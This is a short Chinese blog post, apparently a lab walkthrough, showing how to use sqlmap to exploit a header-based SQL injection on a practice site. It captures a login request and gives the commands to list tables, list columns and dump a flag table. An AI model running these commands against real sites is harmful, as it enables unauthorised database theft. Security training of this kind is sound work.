热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

head注入之sqlmap

head(一)注入环境:http:inject2.lab.aqlab.cn:81Pass-07index.php前面我们都是用的手动注入&

head(一)
注入环境:http://inject2.lab.aqlab.cn:81/Pass-07/index.php
前面我们都是用的手动注入,为了是了解原理,
既然原理清楚了后,我们为了提高效率,就可以使用工具来快速完成任务
攻击流程:
    1;填写正确的账号密码,然后抓包
    2;把抓到的数据保存为一个文件
    3;用sqlmap来自动破解,
    4;获取信息。
  测试开始:
    测试目标获取管理员账号密码

1;填写正确的账号密码,然后抓包

在这里插入图片描述
在这里插入图片描述

2;把抓到的数据保存为一个文件

在这里插入图片描述

3;用sqlmap来自动破解

sqlmap不会的,可以康康这篇博客sqlmap基础用法
在这里插入图片描述

4;获取信息。

获取表名
sqlmap.py -r 321.txt -D head_error --tables
在这里插入图片描述
获取字段
sqlmap.py -r 321.txt -D head_error -T flag_head --columns
在这里插入图片描述
获取字段值
sqlmap.py -r 321.txt -D head_error -T flag_head -C Id,flag_h1 --dump
在这里插入图片描述


推荐阅读
author-avatar
旭峰fd_817
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有